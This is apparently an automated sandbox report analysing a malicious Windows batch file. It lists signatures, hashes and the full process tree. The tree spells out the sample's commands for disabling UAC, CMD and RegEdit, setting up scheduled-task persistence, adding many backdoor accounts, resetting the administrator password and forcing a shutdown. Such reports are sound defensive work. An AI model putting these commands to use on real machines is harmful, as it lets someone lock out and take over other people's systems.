Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
34s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
30/04/2024, 15:25
Static task
static1
General
-
Target
DONOTOPEN.bat
-
Size
9KB
-
MD5
4d53c3d83c92387b73339017093a82d0
-
SHA1
e38992e8b91986cf21052a1cfecedba8a3b6fea6
-
SHA256
6e5d2734a8ed929fbd2862aff022a597b8418dfef0207df1a772f8372790ae76
-
SHA512
7122c7d7b2551ef847e94537971ef159570fe812bae9e8f0defb31afd997cc861919f0a1ad476079ad01b95b3aecb6b506bb6ecc83e95d5c3758903fe6706644
-
SSDEEP
192:UlM+642KhNglPgYCbYBYRCNn9DU2U+ma+RGDzuQj:UlMH4Rh06oU2U+b+sSQj
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Disables RegEdit via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" reg.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\a cmd.exe File created C:\Windows\start.bat certutil.exe File created C:\Windows\a cmd.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4904 schtasks.exe 2176 schtasks.exe 4596 schtasks.exe -
Kills process with taskkill 1 IoCs
pid Process 3696 taskkill.exe -
Modifies registry key 1 TTPs 6 IoCs
pid Process 1684 reg.exe 416 reg.exe 2204 reg.exe 916 reg.exe 1444 reg.exe 2592 reg.exe -
Runs net.exe
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3696 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1136 wrote to memory of 4560 1136 cmd.exe 81 PID 1136 wrote to memory of 4560 1136 cmd.exe 81 PID 1136 wrote to memory of 2788 1136 cmd.exe 82 PID 1136 wrote to memory of 2788 1136 cmd.exe 82 PID 2788 wrote to memory of 3696 2788 cmd.exe 84 PID 2788 wrote to memory of 3696 2788 cmd.exe 84 PID 2788 wrote to memory of 3288 2788 cmd.exe 86 PID 2788 wrote to memory of 3288 2788 cmd.exe 86 PID 3288 wrote to memory of 416 3288 cmd.exe 87 PID 3288 wrote to memory of 416 3288 cmd.exe 87 PID 2788 wrote to memory of 2540 2788 cmd.exe 88 PID 2788 wrote to memory of 2540 2788 cmd.exe 88 PID 2540 wrote to memory of 2204 2540 cmd.exe 89 PID 2540 wrote to memory of 2204 2540 cmd.exe 89 PID 2788 wrote to memory of 684 2788 cmd.exe 90 PID 2788 wrote to memory of 684 2788 cmd.exe 90 PID 684 wrote to memory of 916 684 cmd.exe 91 PID 684 wrote to memory of 916 684 cmd.exe 91 PID 2788 wrote to memory of 4748 2788 cmd.exe 92 PID 2788 wrote to memory of 4748 2788 cmd.exe 92 PID 4748 wrote to memory of 1684 4748 cmd.exe 93 PID 4748 wrote to memory of 1684 4748 cmd.exe 93 PID 2788 wrote to memory of 4604 2788 cmd.exe 94 PID 2788 wrote to memory of 4604 2788 cmd.exe 94 PID 4604 wrote to memory of 2592 4604 cmd.exe 95 PID 4604 wrote to memory of 2592 4604 cmd.exe 95 PID 2788 wrote to memory of 1372 2788 cmd.exe 96 PID 2788 wrote to memory of 1372 2788 cmd.exe 96 PID 1372 wrote to memory of 1444 1372 cmd.exe 97 PID 1372 wrote to memory of 1444 1372 cmd.exe 97 PID 2788 wrote to memory of 4904 2788 cmd.exe 98 PID 2788 wrote to memory of 4904 2788 cmd.exe 98 PID 2788 wrote to memory of 2176 2788 cmd.exe 99 PID 2788 wrote to memory of 2176 2788 cmd.exe 99 PID 2788 wrote to memory of 4596 2788 cmd.exe 100 PID 2788 wrote to memory of 4596 2788 cmd.exe 100 PID 2788 wrote to memory of 1812 2788 cmd.exe 101 PID 2788 wrote to memory of 1812 2788 cmd.exe 101 PID 1812 wrote to memory of 4436 1812 net.exe 102 PID 1812 wrote to memory of 4436 1812 net.exe 102 PID 2788 wrote to memory of 2396 2788 cmd.exe 103 PID 2788 wrote to memory of 2396 2788 cmd.exe 103 PID 2396 wrote to memory of 3704 2396 net.exe 104 PID 2396 wrote to memory of 3704 2396 net.exe 104 PID 2788 wrote to memory of 1768 2788 cmd.exe 105 PID 2788 wrote to memory of 1768 2788 cmd.exe 105 PID 1768 wrote to memory of 3848 1768 net.exe 106 PID 1768 wrote to memory of 3848 1768 net.exe 106 PID 2788 wrote to memory of 4820 2788 cmd.exe 107 PID 2788 wrote to memory of 4820 2788 cmd.exe 107 PID 4820 wrote to memory of 2104 4820 net.exe 108 PID 4820 wrote to memory of 2104 4820 net.exe 108 PID 2788 wrote to memory of 3332 2788 cmd.exe 109 PID 2788 wrote to memory of 3332 2788 cmd.exe 109 PID 3332 wrote to memory of 3648 3332 net.exe 110 PID 3332 wrote to memory of 3648 3332 net.exe 110 PID 2788 wrote to memory of 2976 2788 cmd.exe 111 PID 2788 wrote to memory of 2976 2788 cmd.exe 111 PID 2976 wrote to memory of 4160 2976 net.exe 112 PID 2976 wrote to memory of 4160 2976 net.exe 112 PID 2788 wrote to memory of 1052 2788 cmd.exe 113 PID 2788 wrote to memory of 1052 2788 cmd.exe 113 PID 1052 wrote to memory of 2424 1052 net.exe 114 PID 1052 wrote to memory of 2424 1052 net.exe 114 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\DONOTOPEN.bat"1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1136 -
C:\Windows\system32\certutil.execertutil -decode a start.bat2⤵
- Drops file in Windows directory
PID:4560
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K start.bat2⤵
- Suspicious use of WriteProcessMemory
PID:2788 -
C:\Windows\system32\taskkill.exeTASKKILL /f /im explorer.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3696
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c C:\Windows\System32\reg.exe ADD HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f3⤵
- Suspicious use of WriteProcessMemory
PID:3288 -
C:\Windows\System32\reg.exeC:\Windows\System32\reg.exe ADD HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f4⤵
- Modifies registry key
PID:416
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Windows\System32\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
- Modifies registry key
PID:2204
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c C:\Windows\System32\reg.exe ADD HKCU\Software\Policies\Microsoft\Windows\System /v NoRun /t REG_DWORD /d 1 /f3⤵
- Suspicious use of WriteProcessMemory
PID:684 -
C:\Windows\System32\reg.exeC:\Windows\System32\reg.exe ADD HKCU\Software\Policies\Microsoft\Windows\System /v NoRun /t REG_DWORD /d 1 /f4⤵
- Modifies registry key
PID:916
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c C:\Windows\System32\reg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f3⤵
- Suspicious use of WriteProcessMemory
PID:4748 -
C:\Windows\System32\reg.exeC:\Windows\System32\reg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f4⤵
- Disables RegEdit via registry modification
- Modifies registry key
PID:1684
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c C:\Windows\System32\reg.exe ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticecaption /t REG_SZ /d "Uh oh, something's wrong..." /f3⤵
- Suspicious use of WriteProcessMemory
PID:4604 -
C:\Windows\System32\reg.exeC:\Windows\System32\reg.exe ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticecaption /t REG_SZ /d "Uh oh, something's wrong..." /f4⤵
- Modifies registry key
PID:2592
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c C:\Windows\System32\reg.exe ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticetext /t REG_SZ /d "Check README.txt dropped on your desktop for more information" /f3⤵
- Suspicious use of WriteProcessMemory
PID:1372 -
C:\Windows\System32\reg.exeC:\Windows\System32\reg.exe ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticetext /t REG_SZ /d "Check README.txt dropped on your desktop for more information" /f4⤵
- Modifies registry key
PID:1444
-
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Create /SC MINUTE /MO 1 /TN virusalert /TR C:\Users\Admin\AppData\LocalLow\Microsoft\WindowsDefenderFuckService\alert.bat /IT3⤵
- Creates scheduled task(s)
PID:4904
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Create /SC MINUTE /MO 1 /TN firewallaelrt /TR C:\Users\Admin\AppData\LocalLow\Microsoft\WindowsDefenderFuckService\alert.vbs /IT3⤵
- Creates scheduled task(s)
PID:2176
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Create /SC MINUTE /MO 1 /TN DefenderTotalFuck /TR C:\Users\Admin\AppData\LocalLow\Microsoft\WindowsDefenderFuckService\runit.bat /IT3⤵
- Creates scheduled task(s)
PID:4596
-
-
C:\Windows\system32\net.exeNET USER HACKER001 Trash0001 /add3⤵
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER HACKER001 Trash0001 /add4⤵PID:4436
-
-
-
C:\Windows\system32\net.exeNET USER HACKER002 Trash0001 /add3⤵
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER HACKER002 Trash0001 /add4⤵PID:3704
-
-
-
C:\Windows\system32\net.exeNET USER HACKER003 Trash0001 /add3⤵
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER HACKER003 Trash0001 /add4⤵PID:3848
-
-
-
C:\Windows\system32\net.exeNET USER HACKER004 Trash0001 /add3⤵
- Suspicious use of WriteProcessMemory
PID:4820 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER HACKER004 Trash0001 /add4⤵PID:2104
-
-
-
C:\Windows\system32\net.exeNET USER HACKER005 Trash0001 /add3⤵
- Suspicious use of WriteProcessMemory
PID:3332 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER HACKER005 Trash0001 /add4⤵PID:3648
-
-
-
C:\Windows\system32\net.exeNET USER HACKER006 Trash0001 /add3⤵
- Suspicious use of WriteProcessMemory
PID:2976 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER HACKER006 Trash0001 /add4⤵PID:4160
-
-
-
C:\Windows\system32\net.exeNET USER HACKER007 Trash0001 /add3⤵
- Suspicious use of WriteProcessMemory
PID:1052 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER HACKER007 Trash0001 /add4⤵PID:2424
-
-
-
C:\Windows\system32\net.exeNET USER HACKER008 Trash0001 /add3⤵PID:2580
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER HACKER008 Trash0001 /add4⤵PID:1532
-
-
-
C:\Windows\system32\net.exeNET USER HACKER009 Trash0001 /add3⤵PID:1360
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER HACKER009 Trash0001 /add4⤵PID:1008
-
-
-
C:\Windows\system32\net.exeNET USER HACKER010 Trash0001 /add3⤵PID:2044
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER HACKER010 Trash0001 /add4⤵PID:3832
-
-
-
C:\Windows\system32\net.exeNET USER HACKER011 Trash0001 /add3⤵PID:4900
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER HACKER011 Trash0001 /add4⤵PID:4896
-
-
-
C:\Windows\system32\net.exeNET USER HACKER012 Trash0001 /add3⤵PID:764
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER HACKER012 Trash0001 /add4⤵PID:428
-
-
-
C:\Windows\system32\net.exeNET USER HACKER013 Trash0001 /add3⤵PID:2184
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER HACKER013 Trash0001 /add4⤵PID:8
-
-
-
C:\Windows\system32\net.exeNET USER HACKER014 Trash0001 /add3⤵PID:2004
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER HACKER014 Trash0001 /add4⤵PID:2400
-
-
-
C:\Windows\system32\net.exeNET USER HACKER015 Trash0001 /add3⤵PID:4548
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER HACKER015 Trash0001 /add4⤵PID:4636
-
-
-
C:\Windows\system32\net.exeNET USER HACKER016 Trash0001 /add3⤵PID:4884
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER HACKER016 Trash0001 /add4⤵PID:4480
-
-
-
C:\Windows\system32\net.exeNET USER HACKER017 Trash0001 /add3⤵PID:3340
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER HACKER017 Trash0001 /add4⤵PID:3372
-
-
-
C:\Windows\system32\net.exeNET USER HACKER018 Trash0001 /add3⤵PID:3452
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER HACKER018 Trash0001 /add4⤵PID:4288
-
-
-
C:\Windows\system32\net.exeNET USER HACKER019 Trash0001 /add3⤵PID:4232
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER HACKER019 Trash0001 /add4⤵PID:4524
-
-
-
C:\Windows\system32\net.exeNET USER HACKER020 Trash0001 /add3⤵PID:3100
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER HACKER020 Trash0001 /add4⤵PID:2084
-
-
-
C:\Windows\system32\net.exeNET USER Administrator Trashedpc013⤵PID:1716
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER Administrator Trashedpc014⤵PID:3776
-
-
-
C:\Windows\system32\net.exeNET USER Admin Trashedpc013⤵PID:4864
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER Admin Trashedpc014⤵PID:4796
-
-
-
C:\Windows\system32\shutdown.exeshutdown /s /t 5 /c You are an idiot! HAHAHAHAHAHAHA3⤵PID:2412
-
-
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\LocalLow\Microsoft\WindowsDefenderFuckService\alert.bat"1⤵PID:5032
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\LocalLow\Microsoft\WindowsDefenderFuckService\alert.vbs"1⤵PID:4888
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\LocalLow\Microsoft\WindowsDefenderFuckService\runit.bat"1⤵PID:1556
-
C:\Windows\system32\schtasks.exeSCHTASKS /Run /TN virusalert2⤵PID:4220
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Run /TN firewallalert2⤵PID:1432
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
435B
MD5ab1b7b617bc14004ba2291b28ba1a13c
SHA176bc336ea75743db95742df682a7f1bd5d495a9b
SHA2569d1f99df292cc3c17df264810458358c4b303236150a7447c6c5a299067e5530
SHA5121d42fa77bbe1f83c216c37cde9acada960110078bf9705997c056c5ca975e15e20488ca6a13232a8ebe885cbabeeac21887932568bbb038e204dd9e190cbe74c
-
Filesize
896B
MD51c0a55a868aa2003dcb51e010d3b566e
SHA1f63c853e91f094af8f6c0db0a79979838845c38d
SHA256fd72a0fb87595ff91d3c78a5e7eb584ee347c35d6b1466841a675bb23158c426
SHA512ce55e13f2b3b9b4e6d641114bc7a6ee6543be65b206f0ab6fa081d2bef580232cce6b59626e62f32982b9cbb1bf6c4fc093c7891528c8bda88ebc6b112ea803a
-
Filesize
65B
MD55d98878f4cec866f540d627a905b5dc9
SHA16ad61fd942be1dba4130cc51c1b5f11dad6558cb
SHA2560f7e7769567ebfac514d5ca738644fcbbb3194e963a9be65f17e62f58075360d
SHA5125146f84d2e39a43ba7592bc8f9e99ee1174f2effaee4a4b5ecffcce554760eb1f8264de13e50cc9b36ddeeeb8ba6a5d868b287548c901a3de2f998eb67ec4f16
-
Filesize
8KB
MD565888f1a707233e12b232b53ae1a7b77
SHA1be27cd99043bc7cdf220a5d396aa46e6292bc87d
SHA256e6ce11f3c97c2e62a41a1a5c01a5fc3391d39e6ef1c45c3134ce1cd182995b97
SHA5120ed36491f4386f78a4a8a8099a3fa4bc78852a467aee524a06b2a75a68d1b9f437efb9ba2eab5c7ffc4e71bdbbf93b6820ea25134f22fc76e9cf5acab053831f
-
Filesize
4KB
MD553d27ec4d1ee59de6ccce556bcee63ab
SHA1c9f1a39f1f8fa7047acde3be5dc8321e4fe238b0
SHA256c2b977bdbd6df8e045ca51961b8c5a47ffd1017a27e24c90da19fcedff818d10
SHA5127a38cc222d3806dfba0dc7deff1361e8f73f995230b69fd1054a3ee03345331a751ab9e78debfdaa4c988f9d25ae72215b51520eb8cbecb17db68bf716fe855f
-
Filesize
5KB
MD592001ff0cdf2d1734fa43ca0b7b53e86
SHA1ec6c837d9ee3bc2037ce2889748a353a6f8a1d29
SHA256ba66ffcd3ae6ce6ee7dc74c639791ab454afab6b124ce11be2131f99e37a2b6d
SHA5127f0d8ba2adb6305b0f30e1800775f107c30b691c2a2ae04420efb9f70fb237ecfb0e3e945825bef887f1ed6dfc3145b2d724e9505c01de551ae99cf98558d91e